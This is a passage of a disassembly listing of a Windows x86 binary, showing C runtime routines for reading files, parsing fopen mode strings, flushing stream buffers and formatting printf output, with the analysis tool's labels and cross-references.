mov [esi+4], eax
test eax, eax
jz short loc_41F9A6
cmp eax, 0FFFFFFFFh
jz short loc_41F9A6
mov edx, [esi+0Ch]
test dl, 82h
jnz short loc_41F97B
mov ecx, [esi+10h]
push edi
cmp ecx, 0FFFFFFFFh
jz short loc_41F964
mov edi, ecx
sar edi, 5
and ecx, 1Fh
mov edi, dword_4DD040[edi*4]
lea edi, [edi+ecx*8]
jmp short loc_41F969
; ---------------------------------------------------------------------------
loc_41F964: ; CODE XREF: sub_41F8E3+6B�j
mov edi, offset dword_43D4D0
loc_41F969: ; CODE XREF: sub_41F8E3+7F�j
mov cl, [edi+4]
pop edi
and cl, 82h
cmp cl, 82h
jnz short loc_41F97B
or dh, 20h
mov [esi+0Ch], edx
loc_41F97B: ; CODE XREF: sub_41F8E3+62�j
; sub_41F8E3+90�j
cmp dword ptr [esi+18h], 200h
jnz short loc_41F998
mov ecx, [esi+0Ch]
test cl, 8
jz short loc_41F998
test ch, 4
jnz short loc_41F998
mov dword ptr [esi+18h], 1000h
loc_41F998: ; CODE XREF: sub_41F8E3+9F�j
; sub_41F8E3+A7�j ...
mov ecx, [esi]
dec eax
mov [esi+4], eax
movzx eax, byte ptr [ecx]
inc ecx
mov [esi], ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_41F9A6: ; CODE XREF: sub_41F8E3+55�j
; sub_41F8E3+5A�j
neg eax
sbb eax, eax
and eax, 10h
add eax, 10h
or [esi+0Ch], eax
and dword ptr [esi+4], 0
loc_41F9B7: ; CODE XREF: sub_41F8E3+A�j
; sub_41F8E3+12�j ...
or eax, 0FFFFFFFFh
pop esi
retn
sub_41F8E3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F9BC proc near ; CODE XREF: sub_41BAFA+90�p
; sub_41F8E3+48�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
cmp esi, dword_4DD140
jnb loc_41FB99
mov eax, esi
and esi, 1Fh
sar eax, 5
shl esi, 3
lea ebx, ds:4DD040h[eax*4]
mov eax, dword_4DD040[eax*4]
add eax, esi
mov dl, [eax+4]
test dl, 1
jz loc_41FB99
and [ebp+var_8], 0
mov edi, [ebp+arg_4]
cmp [ebp+arg_8], 0
mov ecx, edi
jz short loc_41FA71
test dl, 2
jnz short loc_41FA71
test dl, 48h
jz short loc_41FA31
mov al, [eax+5]
cmp al, 0Ah
jz short loc_41FA31
dec [ebp+arg_8]
mov [edi], al
mov eax, [ebx]
lea ecx, [edi+1]
mov [ebp+var_8], 1
mov byte ptr [eax+esi+5], 0Ah
loc_41FA31: ; CODE XREF: sub_41F9BC+56�j
; sub_41F9BC+5D�j
lea eax, [ebp+var_C]
push 0
push eax
mov eax, [ebx]
push [ebp+arg_8]
push ecx
push dword ptr [eax+esi]
call ds:dword_4270EC ; ReadFile
test eax, eax
jnz short loc_41FA84
call ds:dword_427094 ; RtlGetLastWin32Error
push 5
pop ecx
cmp eax, ecx
jnz short loc_41FA6C
mov dword_4DBDDC, 9
mov dword_4DBDE0, ecx
jmp loc_41FBAA
; ---------------------------------------------------------------------------
loc_41FA6C: ; CODE XREF: sub_41F9BC+99�j
cmp eax, 6Dh
jnz short loc_41FA78
loc_41FA71: ; CODE XREF: sub_41F9BC+4C�j
; sub_41F9BC+51�j
xor eax, eax
jmp loc_41FBAD
; ---------------------------------------------------------------------------
loc_41FA78: ; CODE XREF: sub_41F9BC+B3�j
push eax
call sub_420C7F
pop ecx
jmp loc_41FBAA
; ---------------------------------------------------------------------------
loc_41FA84: ; CODE XREF: sub_41F9BC+8C�j
mov eax, [ebx]
mov edx, [ebp+var_C]
add [ebp+var_8], edx
lea ecx, [eax+esi+4]
mov al, [eax+esi+4]
test al, 80h
jz loc_41FB94
test edx, edx
jz short loc_41FAA9
cmp byte ptr [edi], 0Ah
jnz short loc_41FAA9
or al, 4
jmp short loc_41FAAB
; ---------------------------------------------------------------------------
loc_41FAA9: ; CODE XREF: sub_41F9BC+E2�j
; sub_41F9BC+E7�j
and al, 0FBh
loc_41FAAB: ; CODE XREF: sub_41F9BC+EB�j
mov [ecx], al
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_8]
mov [ebp+arg_8], eax
add ecx, eax
cmp eax, ecx
mov [ebp+var_8], ecx
jnb loc_41FB8E
loc_41FAC3: ; CODE XREF: sub_41F9BC+1BA�j
mov eax, [ebp+arg_8]
mov al, [eax]
cmp al, 1Ah
jz loc_41FB7E
cmp al, 0Dh
jz short loc_41FADF
mov [edi], al
inc edi
inc [ebp+arg_8]
jmp loc_41FB70
; ---------------------------------------------------------------------------
loc_41FADF: ; CODE XREF: sub_41F9BC+116�j
dec ecx
cmp [ebp+arg_8], ecx
jnb short loc_41FAFD
mov eax, [ebp+arg_8]
inc eax
cmp byte ptr [eax], 0Ah
jnz short loc_41FAF4
add [ebp+arg_8], 2
jmp short loc_41FB52
; ---------------------------------------------------------------------------
loc_41FAF4: ; CODE XREF: sub_41F9BC+130�j
mov byte ptr [edi], 0Dh
inc edi
mov [ebp+arg_8], eax
jmp short loc_41FB70
; ---------------------------------------------------------------------------
loc_41FAFD: ; CODE XREF: sub_41F9BC+127�j
lea eax, [ebp+var_C]
push 0
push eax
inc [ebp+arg_8]
lea eax, [ebp+var_1]
push 1
push eax
mov eax, [ebx]
push dword ptr [eax+esi]
call ds:dword_4270EC ; ReadFile
test eax, eax
jnz short loc_41FB25
call ds:dword_427094 ; RtlGetLastWin32Error
test eax, eax
jnz short loc_41FB6C
loc_41FB25: ; CODE XREF: sub_41F9BC+15D�j
cmp [ebp+var_C], 0
jz short loc_41FB6C
mov eax, [ebx]
test byte ptr [eax+esi+4], 48h
jz short loc_41FB47
mov al, [ebp+var_1]
cmp al, 0Ah
jz short loc_41FB52
mov byte ptr [edi], 0Dh
mov ecx, [ebx]
inc edi
mov [ecx+esi+5], al
jmp short loc_41FB70
; ---------------------------------------------------------------------------
loc_41FB47: ; CODE XREF: sub_41F9BC+176�j
cmp edi, [ebp+arg_4]
jnz short loc_41FB57
cmp [ebp+var_1], 0Ah
jnz short loc_41FB57
loc_41FB52: ; CODE XREF: sub_41F9BC+136�j
; sub_41F9BC+17D�j
mov byte ptr [edi], 0Ah
jmp short loc_41FB6F
; ---------------------------------------------------------------------------
loc_41FB57: ; CODE XREF: sub_41F9BC+18E�j
; sub_41F9BC+194�j
push 1
push 0FFFFFFFFh
push [ebp+arg_0]
call sub_422F09
add esp, 0Ch
cmp [ebp+var_1], 0Ah
jz short loc_41FB70
loc_41FB6C: ; CODE XREF: sub_41F9BC+167�j
; sub_41F9BC+16D�j
mov byte ptr [edi], 0Dh
loc_41FB6F: ; CODE XREF: sub_41F9BC+199�j
inc edi
loc_41FB70: ; CODE XREF: sub_41F9BC+11E�j
; sub_41F9BC+13F�j ...
mov ecx, [ebp+var_8]
cmp [ebp+arg_8], ecx
jb loc_41FAC3
jmp short loc_41FB8E
; ---------------------------------------------------------------------------
loc_41FB7E: ; CODE XREF: sub_41F9BC+10E�j
mov eax, [ebx]
lea esi, [eax+esi+4]
mov al, [esi]
test al, 40h
jnz short loc_41FB8E
or al, 2
mov [esi], al
loc_41FB8E: ; CODE XREF: sub_41F9BC+101�j
; sub_41F9BC+1C0�j ...
sub edi, [ebp+arg_4]
mov [ebp+var_8], edi
loc_41FB94: ; CODE XREF: sub_41F9BC+DA�j
mov eax, [ebp+var_8]
jmp short loc_41FBAD
; ---------------------------------------------------------------------------
loc_41FB99: ; CODE XREF: sub_41F9BC+12�j
; sub_41F9BC+39�j
and dword_4DBDE0, 0
mov dword_4DBDDC, 9
loc_41FBAA: ; CODE XREF: sub_41F9BC+AB�j
; sub_41F9BC+C3�j
or eax, 0FFFFFFFFh
loc_41FBAD: ; CODE XREF: sub_41F9BC+B7�j
; sub_41F9BC+1DB�j
pop edi
pop esi
pop ebx
leave
retn
sub_41F9BC endp
; =============== S U B R O U T I N E =======================================
sub_41FBB2 proc near ; CODE XREF: sub_41BBE2+126�p
; sub_41BBE2+24B�p ...
arg_0 = dword ptr 4
mov eax, dword_4DBE44
test eax, eax
jz short loc_41FBCA
push [esp+arg_0]
call eax
test eax, eax
pop ecx
jz short loc_41FBCA
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_41FBCA: ; CODE XREF: sub_41FBB2+7�j
; sub_41FBB2+12�j
xor eax, eax
retn
sub_41FBB2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FBCD proc near ; CODE XREF: sub_41BE82+17�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, dword_4DBFB0
push edi
mov edi, [ebp+arg_4]
xor ebx, ebx
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
mov al, [edi]
cmp al, 61h
jz short loc_41FC06
cmp al, 72h
jz short loc_41FBFF
cmp al, 77h
jnz loc_41FD1A
mov ecx, 301h
jmp short loc_41FC0B
; ---------------------------------------------------------------------------
loc_41FBFF: ; CODE XREF: sub_41FBCD+21�j
xor ecx, ecx
or esi, 1
jmp short loc_41FC0E
; ---------------------------------------------------------------------------
loc_41FC06: ; CODE XREF: sub_41FBCD+1D�j
mov ecx, 109h
loc_41FC0B: ; CODE XREF: sub_41FBCD+30�j
or esi, 2
loc_41FC0E: ; CODE XREF: sub_41FBCD+37�j
push 1
pop edx
loc_41FC11: ; CODE XREF: sub_41FBCD+8B�j
; sub_41FBCD+A0�j ...
mov al, [edi+1]
inc edi
cmp al, bl
jz loc_41FD00
cmp edx, ebx
jz loc_41FD00
movsx eax, al
cmp eax, 54h
jg short loc_41FC9F
jz short loc_41FC8F
sub eax, 2Bh
jz short loc_41FC79
sub eax, 19h
jz short loc_41FC6F
sub eax, 0Eh
jz short loc_41FC5A
dec eax
jnz loc_41FCF1
cmp [ebp+var_4], ebx
jnz loc_41FCF1
mov [ebp+var_4], 1
or ecx, 20h
jmp short loc_41FC11
; ---------------------------------------------------------------------------
loc_41FC5A: ; CODE XREF: sub_41FBCD+6F�j
cmp [ebp+var_4], ebx
jnz loc_41FCF1
mov [ebp+var_4], 1
or ecx, 10h
jmp short loc_41FC11
; ---------------------------------------------------------------------------
loc_41FC6F: ; CODE XREF: sub_41FBCD+6A�j
test cl, 40h
jnz short loc_41FCF1
or ecx, 40h
jmp short loc_41FC11
; ---------------------------------------------------------------------------
loc_41FC79: ; CODE XREF: sub_41FBCD+65�j
test cl, 2
jnz short loc_41FCF1
and ecx, 0FFFFFFFEh
and esi, 0FFFFFFFCh
or ecx, 2
or esi, 80h
jmp short loc_41FC11
; ---------------------------------------------------------------------------
loc_41FC8F: ; CODE XREF: sub_41FBCD+60�j
mov eax, 1000h
test ecx, eax
jnz short loc_41FCF1
or ecx, eax
jmp loc_41FC11
; ---------------------------------------------------------------------------
loc_41FC9F: ; CODE XREF: sub_41FBCD+5E�j
sub eax, 62h
jz short loc_41FCEC
dec eax
jz short loc_41FCD5
sub eax, 0Bh
jz short loc_41FCBE
sub eax, 6
jnz short loc_41FCF1
test ch, 0C0h
jnz short loc_41FCF1
or ch, 40h
jmp loc_41FC11
; ---------------------------------------------------------------------------
loc_41FCBE: ; CODE XREF: sub_41FBCD+DD�j
cmp [ebp+var_8], ebx
jnz short loc_41FCF1
mov [ebp+var_8], 1
and esi, 0FFFFBFFFh
jmp loc_41FC11
; ---------------------------------------------------------------------------
loc_41FCD5: ; CODE XREF: sub_41FBCD+D8�j
cmp [ebp+var_8], ebx
jnz short loc_41FCF1
mov [ebp+var_8], 1
or esi, 4000h
jmp loc_41FC11
; ---------------------------------------------------------------------------
loc_41FCEC: ; CODE XREF: sub_41FBCD+D5�j
test ch, 0C0h
jz short loc_41FCF8
loc_41FCF1: ; CODE XREF: sub_41FBCD+72�j
; sub_41FBCD+7B�j ...
xor edx, edx
jmp loc_41FC11
; ---------------------------------------------------------------------------
loc_41FCF8: ; CODE XREF: sub_41FBCD+122�j
or ch, 80h
jmp loc_41FC11
; ---------------------------------------------------------------------------
loc_41FD00: ; CODE XREF: sub_41FBCD+4A�j
; sub_41FBCD+52�j
push 1A4h
push [ebp+arg_8]
push ecx
push [ebp+arg_0]
call sub_42423B
mov ecx, eax
add esp, 10h
cmp ecx, ebx
jge short loc_41FD1E
loc_41FD1A: ; CODE XREF: sub_41FBCD+25�j
xor eax, eax
jmp short loc_41FD38
; ---------------------------------------------------------------------------
loc_41FD1E: ; CODE XREF: sub_41FBCD+14B�j
mov eax, [ebp+arg_C]
inc dword_4DBFAC
mov [eax+0Ch], esi
mov [eax+4], ebx
mov [eax], ebx
mov [eax+8], ebx
mov [eax+1Ch], ebx
mov [eax+10h], ecx
loc_41FD38: ; CODE XREF: sub_41FBCD+14F�j
pop edi
pop esi
pop ebx
leave
retn
sub_41FBCD endp
; =============== S U B R O U T I N E =======================================
sub_41FD3D proc near ; CODE XREF: sub_41BE82�p
mov edx, dword_4DD020
push ebx
push ebp
push esi
xor ebp, ebp
xor esi, esi
xor eax, eax
cmp edx, ebp
push edi
jle short loc_41FDAE
mov ebx, dword_4DC01C
mov edi, ebx
loc_41FD59: ; CODE XREF: sub_41FD3D+2E�j
mov ecx, [edi]
cmp ecx, ebp
jz short loc_41FD74
test byte ptr [ecx+0Ch], 83h
jz short loc_41FD6F
inc eax
add edi, 4
cmp eax, edx
jl short loc_41FD59
jmp short loc_41FDAE
; ---------------------------------------------------------------------------
loc_41FD6F: ; CODE XREF: sub_41FD3D+26�j
mov esi, [ebx+eax*4]
jmp short loc_41FD98
; ---------------------------------------------------------------------------
loc_41FD74: ; CODE XREF: sub_41FD3D+20�j
mov edi, eax
push 20h
shl edi, 2
call sub_41BEB5
pop ecx
mov ecx, dword_4DC01C
mov [edi+ecx], eax
mov eax, dword_4DC01C
mov edi, [edi+eax]
cmp edi, ebp
jz short loc_41FDAE
mov esi, edi
loc_41FD98: ; CODE XREF: sub_41FD3D+35�j
cmp esi, ebp
jz short loc_41FDAE
or dword ptr [esi+10h], 0FFFFFFFFh
mov [esi+4], ebp
mov [esi+0Ch], ebp
mov [esi+8], ebp
mov [esi], ebp
mov [esi+1Ch], ebp
loc_41FDAE: ; CODE XREF: sub_41FD3D+12�j
; sub_41FD3D+30�j ...
mov eax, esi
pop edi
pop esi
pop ebp
pop ebx
retn
sub_41FD3D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FDB5 proc near ; CODE XREF: sub_41C0CE+17�p
; sub_41C0CE+58�p ...
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
lea ecx, [eax+1]
cmp ecx, 100h
ja short loc_41FDD3
mov ecx, off_43CE78
movzx eax, word ptr [ecx+eax*2]
jmp short loc_41FE25
; ---------------------------------------------------------------------------
loc_41FDD3: ; CODE XREF: sub_41FDB5+10�j
mov ecx, eax
push esi
mov esi, off_43CE78
sar ecx, 8
movzx edx, cl
test byte ptr [esi+edx*2+1], 80h
pop esi
jz short loc_41FDF8
and [ebp+var_2], 0
mov [ebp+var_4], cl
mov [ebp+var_3], al
push 2
jmp short loc_41FE01
; ---------------------------------------------------------------------------
loc_41FDF8: ; CODE XREF: sub_41FDB5+33�j
and [ebp+var_3], 0
mov [ebp+var_4], al
push 1
loc_41FE01: ; CODE XREF: sub_41FDB5+41�j
pop eax
lea ecx, [ebp+arg_0+2]
push 1
push 0
push 0
push ecx
push eax
lea eax, [ebp+var_4]
push eax
push 1
call sub_4244F4
add esp, 1Ch
test eax, eax
jnz short loc_41FE21
leave
retn
; ---------------------------------------------------------------------------
loc_41FE21: ; CODE XREF: sub_41FDB5+68�j
movzx eax, word ptr [ebp+arg_0+2]
loc_41FE25: ; CODE XREF: sub_41FDB5+1C�j
and eax, [ebp+arg_4]
leave
retn
sub_41FDB5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FE2A proc near ; CODE XREF: sub_41C266+46�p
; sub_41C360+45�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_4]
mov eax, [esi+0Ch]
mov ebx, [esi+10h]
test al, 82h
jz loc_41FF33
test al, 40h
jnz loc_41FF33
test al, 1
jz short loc_41FE62
and dword ptr [esi+4], 0
test al, 10h
jz loc_41FF33
mov ecx, [esi+8]
and al, 0FEh
mov [esi], ecx
mov [esi+0Ch], eax
loc_41FE62: ; CODE XREF: sub_41FE2A+20�j
mov eax, [esi+0Ch]
and dword ptr [esi+4], 0
and [ebp+arg_4], 0
and al, 0EFh
or al, 2
test ax, 10Ch
mov [esi+0Ch], eax
jnz short loc_41FE9C
cmp esi, offset dword_43D588
jz short loc_41FE8A
cmp esi, offset dword_43D5A8
jnz short loc_41FE95
loc_41FE8A: ; CODE XREF: sub_41FE2A+56�j
push ebx
call sub_42463D
test eax, eax
pop ecx
jnz short loc_41FE9C
loc_41FE95: ; CODE XREF: sub_41FE2A+5E�j
push esi
call sub_4241F7
pop ecx
loc_41FE9C: ; CODE XREF: sub_41FE2A+4E�j
; sub_41FE2A+69�j
test word ptr [esi+0Ch], 108h
push edi
jz short loc_41FF09
mov eax, [esi+8]
mov edi, [esi]
sub edi, eax
lea ecx, [eax+1]
mov [esi], ecx
mov ecx, [esi+18h]
dec ecx
test edi, edi
mov [esi+4], ecx
jle short loc_41FECC
push edi
push eax
push ebx
call sub_4230FB
add esp, 0Ch
mov [ebp+arg_4], eax
jmp short loc_41FEFF
; ---------------------------------------------------------------------------
loc_41FECC: ; CODE XREF: sub_41FE2A+90�j
cmp ebx, 0FFFFFFFFh
jz short loc_41FEE7
mov eax, ebx
mov ecx, ebx
sar eax, 5
and ecx, 1Fh
mov eax, dword_4DD040[eax*4]
lea eax, [eax+ecx*8]
jmp short loc_41FEEC
; ---------------------------------------------------------------------------
loc_41FEE7: ; CODE XREF: sub_41FE2A+A5�j
mov eax, offset dword_43D4D0
loc_41FEEC: ; CODE XREF: sub_41FE2A+BB�j
test byte ptr [eax+4], 20h
jz short loc_41FEFF
push 2
push 0
push ebx
call sub_422F09
add esp, 0Ch
loc_41FEFF: ; CODE XREF: sub_41FE2A+A0�j
; sub_41FE2A+C6�j
mov eax, [esi+8]
mov cl, byte ptr [ebp+arg_0]
mov [eax], cl
jmp short loc_41FF1D
; ---------------------------------------------------------------------------
loc_41FF09: ; CODE XREF: sub_41FE2A+79�j
push 1
lea eax, [ebp+arg_0]
pop edi
push edi
push eax
push ebx
call sub_4230FB
add esp, 0Ch
mov [ebp+arg_4], eax
loc_41FF1D: ; CODE XREF: sub_41FE2A+DD�j
cmp [ebp+arg_4], edi
pop edi
jz short loc_41FF29
or dword ptr [esi+0Ch], 20h
jmp short loc_41FF38
; ---------------------------------------------------------------------------
loc_41FF29: ; CODE XREF: sub_41FE2A+F7�j
mov eax, [ebp+arg_0]
and eax, 0FFh
jmp short loc_41FF3B
; ---------------------------------------------------------------------------
loc_41FF33: ; CODE XREF: sub_41FE2A+10�j
; sub_41FE2A+18�j ...
or al, 20h
mov [esi+0Ch], eax
loc_41FF38: ; CODE XREF: sub_41FE2A+FD�j
or eax, 0FFFFFFFFh
loc_41FF3B: ; CODE XREF: sub_41FE2A+107�j
pop esi
pop ebx
pop ebp
retn
sub_41FE2A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FF3F proc near ; CODE XREF: sub_41C266+29�p
; sub_41C360+28�p ...
var_248 = byte ptr -248h
var_247 = byte ptr -247h
var_49 = byte ptr -49h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 248h
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
xor esi, esi
mov bl, [edi]
inc edi
test bl, bl
mov [ebp+var_C], esi
mov [ebp+var_14], esi
mov [ebp+arg_4], edi
jz loc_420658
mov ecx, [ebp+var_10]
xor edx, edx
jmp short loc_41FF73
; ---------------------------------------------------------------------------
loc_41FF6B: ; CODE XREF: sub_41FF3F+713�j
mov ecx, [ebp+var_10]
mov esi, [ebp+var_30]
xor edx, edx
loc_41FF73: ; CODE XREF: sub_41FF3F+2A�j
cmp [ebp+var_14], edx
jl loc_420658
cmp bl, 20h
jl short loc_41FF94
cmp bl, 78h
jg short loc_41FF94
movsx eax, bl
mov al, [eax+42771Ch]
and eax, 0Fh
jmp short loc_41FF96
; ---------------------------------------------------------------------------
loc_41FF94: ; CODE XREF: sub_41FF3F+40�j
; sub_41FF3F+45�j
xor eax, eax
loc_41FF96: ; CODE XREF: sub_41FF3F+53�j
movsx eax, ds:byte_42773C[esi+eax*8]
sar eax, 4
cmp eax, 7 ; switch 8 cases
mov [ebp+var_30], eax
ja loc_420647 ; default
jmp ds:off_420660[eax*4] ; switch jump
loc_41FFB4: ; DATA XREF: .text:off_420660�o
or [ebp+var_10], 0FFFFFFFFh ; jumptable 0041FFAD case 1
mov [ebp+var_34], edx
mov [ebp+var_28], edx
mov [ebp+var_20], edx
mov [ebp+var_1C], edx
mov [ebp+var_4], edx
mov [ebp+var_24], edx
jmp loc_420647 ; default
; ---------------------------------------------------------------------------
loc_41FFCF: ; CODE XREF: sub_41FF3F+6E�j
; DATA XREF: .text:off_420660�o
movsx eax, bl ; jumptable 0041FFAD case 2
sub eax, 20h
jz short loc_420012
sub eax, 3
jz short loc_420009
sub eax, 8
jz short loc_420000
dec eax
dec eax
jz short loc_41FFF7
sub eax, 3
jnz loc_420647 ; default
or [ebp+var_4], 8
jmp loc_420647 ; default
; ---------------------------------------------------------------------------
loc_41FFF7: ; CODE XREF: sub_41FF3F+A4�j
or [ebp+var_4], 4
jmp loc_420647 ; default
; ---------------------------------------------------------------------------
loc_420000: ; CODE XREF: sub_41FF3F+A0�j
or [ebp+var_4], 1
jmp loc_420647 ; default
; ---------------------------------------------------------------------------
loc_420009: ; CODE XREF: sub_41FF3F+9B�j
or byte ptr [ebp+var_4], 80h
jmp loc_420647 ; default
; ---------------------------------------------------------------------------
loc_420012: ; CODE XREF: sub_41FF3F+96�j
or [ebp+var_4], 2
jmp loc_420647 ; default
; ---------------------------------------------------------------------------
loc_42001B: ; CODE XREF: sub_41FF3F+6E�j
; DATA XREF: .text:off_420660�o
cmp bl, 2Ah ; jumptable 0041FFAD case 3
jnz short loc_420043
lea eax, [ebp+arg_8]
push eax
call sub_42071E
test eax, eax
pop ecx
mov [ebp+var_20], eax
jge loc_420647 ; default
or [ebp+var_4], 4
neg eax
loc_42003B: ; CODE XREF: sub_41FF3F+111�j
mov [ebp+var_20], eax
jmp loc_420647 ; default
; ---------------------------------------------------------------------------
loc_420043: ; CODE XREF: sub_41FF3F+DF�j
mov eax, [ebp+var_20]
movsx ecx, bl
lea eax, [eax+eax*4]
lea eax, [ecx+eax*2-30h]
jmp short loc_42003B
; ---------------------------------------------------------------------------
loc_420052: ; CODE XREF: sub_41FF3F+6E�j
; DATA XREF: .text:off_420660�o
mov [ebp+var_10], edx ; jumptable 0041FFAD case 4
jmp loc_420647 ; default
; ---------------------------------------------------------------------------
loc_42005A: ; CODE XREF: sub_41FF3F+6E�j
; DATA XREF: .text:off_420660�o
cmp bl, 2Ah ; jumptable 0041FFAD case 5
jnz short loc_42007D
lea eax, [ebp+arg_8]
push eax
call sub_42071E
test eax, eax
pop ecx
mov [ebp+var_10], eax
jge loc_420647 ; default
or [ebp+var_10], 0FFFFFFFFh
jmp loc_420647 ; default
; ---------------------------------------------------------------------------
loc_42007D: ; CODE XREF: sub_41FF3F+11E�j
lea eax, [ecx+ecx*4]
movsx ecx, bl
lea eax, [ecx+eax*2-30h]
mov [ebp+var_10], eax
jmp loc_420647 ; default
; ---------------------------------------------------------------------------
loc_42008F: ; CODE XREF: sub_41FF3F+6E�j
; DATA XREF: .text:off_420660�o
cmp bl, 49h ; jumptable 0041FFAD case 6
jz short loc_4200C2
cmp bl, 68h
jz short loc_4200B9
cmp bl, 6Ch
jz short loc_4200B0
cmp bl, 77h
jnz loc_420647 ; default
or byte ptr [ebp+var_4+1], 8
jmp loc_420647 ; default
; ---------------------------------------------------------------------------
loc_4200B0: ; CODE XREF: sub_41FF3F+15D�j
or [ebp+var_4], 10h
jmp loc_420647 ; default
; ---------------------------------------------------------------------------
loc_4200B9: ; CODE XREF: sub_41FF3F+158�j
or [ebp+var_4], 20h
jmp loc_420647 ; default
; ---------------------------------------------------------------------------
loc_4200C2: ; CODE XREF: sub_41FF3F+153�j
cmp byte ptr [edi], 36h
jnz short loc_4200DB
cmp byte ptr [edi+1], 34h
jnz short loc_4200DB
inc edi
inc edi
or byte ptr [ebp+var_4+1], 80h
mov [ebp+arg_4], edi
jmp loc_420647 ; default
; ---------------------------------------------------------------------------
loc_4200DB: ; CODE XREF: sub_41FF3F+186�j
; sub_41FF3F+18C�j
mov [ebp+var_30], edx
loc_4200DE: ; CODE XREF: sub_41FF3F+6E�j
; DATA XREF: .text:off_420660�o
mov ecx, off_43CE78 ; jumptable 0041FFAD case 0
mov [ebp+var_24], edx
movzx eax, bl
test byte ptr [ecx+eax*2+1], 80h
jz short loc_42010A
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
movsx eax, bl
push eax
call sub_420680
mov bl, [edi]
add esp, 0Ch
inc edi
mov [ebp+arg_4], edi
loc_42010A: ; CODE XREF: sub_41FF3F+1B0�j
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
movsx eax, bl
push eax
call sub_420680
add esp, 0Ch
jmp loc_420647 ; default
; ---------------------------------------------------------------------------
loc_420122: ; CODE XREF: sub_41FF3F+6E�j
; DATA XREF: .text:off_420660�o
movsx eax, bl ; jumptable 0041FFAD case 7
cmp eax, 67h
jg loc_42034A
cmp eax, 65h
jge loc_4201CD
cmp eax, 58h
jg loc_42022B
jz loc_4203BE
sub eax, 43h
jz loc_4201EE
dec eax
dec eax
jz short loc_4201C3
dec eax
dec eax
jz short loc_4201C3
sub eax, 0Ch
jnz loc_420549
test word ptr [ebp+var_4], 830h
jnz short loc_42016C
or byte ptr [ebp+var_4+1], 8
loc_42016C: ; CODE XREF: sub_41FF3F+227�j
; sub_41FF3F+42A�j
mov esi, [ebp+var_10]
cmp esi, 0FFFFFFFFh
jnz short loc_420179
mov esi, 7FFFFFFFh
loc_420179: ; CODE XREF: sub_41FF3F+233�j
lea eax, [ebp+arg_8]
push eax
call sub_42071E
test word ptr [ebp+var_4], 810h
pop ecx
mov ecx, eax
mov [ebp+var_8], ecx
jz loc_420392
test ecx, ecx
jnz short loc_4201A1
mov ecx, off_43D094
mov [ebp+var_8], ecx
loc_4201A1: ; CODE XREF: sub_41FF3F+257�j
mov [ebp+var_24], 1
mov eax, ecx
loc_4201AA: ; CODE XREF: sub_41FF3F+282�j
mov edx, esi
dec esi
test edx, edx
jz loc_420389
cmp word ptr [eax], 0
jz loc_420389
inc eax
inc eax
jmp short loc_4201AA
; ---------------------------------------------------------------------------
loc_4201C3: ; CODE XREF: sub_41FF3F+212�j
; sub_41FF3F+216�j
mov [ebp+var_34], 1
add bl, 20h
loc_4201CD: ; CODE XREF: sub_41FF3F+1F2�j
or [ebp+var_4], 40h
lea edi, [ebp+var_248]
cmp ecx, edx
mov [ebp+var_8], edi
jge loc_4202B1
mov [ebp+var_10], 6
jmp loc_4202BF
; ---------------------------------------------------------------------------
loc_4201EE: ; CODE XREF: sub_41FF3F+20A�j
test word ptr [ebp+var_4], 830h
jnz short loc_4201FA
or byte ptr [ebp+var_4+1], 8
loc_4201FA: ; CODE XREF: sub_41FF3F+2B5�j
; sub_41FF3F+2F4�j
test word ptr [ebp+var_4], 810h
lea eax, [ebp+arg_8]
push eax
jz short loc_420241
call sub_42073B
push eax
lea eax, [ebp+var_248]
push eax
call sub_424663
add esp, 0Ch
mov [ebp+var_C], eax
test eax, eax
jge short loc_420254
mov [ebp+var_28], 1
jmp short loc_420254
; ---------------------------------------------------------------------------
loc_42022B: ; CODE XREF: sub_41FF3F+1FB�j
sub eax, 5Ah
jz short loc_420262
sub eax, 9
jz short loc_4201FA
dec eax
jz loc_420424
jmp loc_420549
; ---------------------------------------------------------------------------
loc_420241: ; CODE XREF: sub_41FF3F+2C5�j
call sub_42071E
pop ecx
mov [ebp+var_248], al
mov [ebp+var_C], 1
loc_420254: ; CODE XREF: sub_41FF3F+2E1�j
; sub_41FF3F+2EA�j
lea eax, [ebp+var_248]
mov [ebp+var_8], eax
jmp loc_420549
; ---------------------------------------------------------------------------
loc_420262: ; CODE XREF: sub_41FF3F+2EF�j
lea eax, [ebp+arg_8]
push eax
call sub_42071E
test eax, eax
pop ecx
jz short loc_4202A3
mov ecx, [eax+4]
test ecx, ecx
jz short loc_4202A3
